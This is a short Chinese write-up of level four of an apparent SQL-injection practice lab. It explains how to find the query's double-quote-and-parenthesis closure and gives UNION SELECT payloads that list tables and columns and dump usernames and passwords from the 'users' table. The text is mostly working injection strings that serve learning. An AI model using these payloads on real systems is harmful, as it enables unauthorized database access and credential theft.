第四关
输入?id=1和?id=1'结果都是一样,没有报错信息
当我们输入?id=1"的时候,出现了报错信息,根据报错信息我们推测sql语句是
select...from...where id=("我们输入的信息") limit0,1
所以我们输入
?id=1") --+
双引号和括号闭合前面的双引号和括号,--+注释后面的双引号和括号
后面就是
爆表
?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
爆列
?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
爆用户名和密码
?id=-1") union select 1,group_concat(username),group_concat(password) from users--+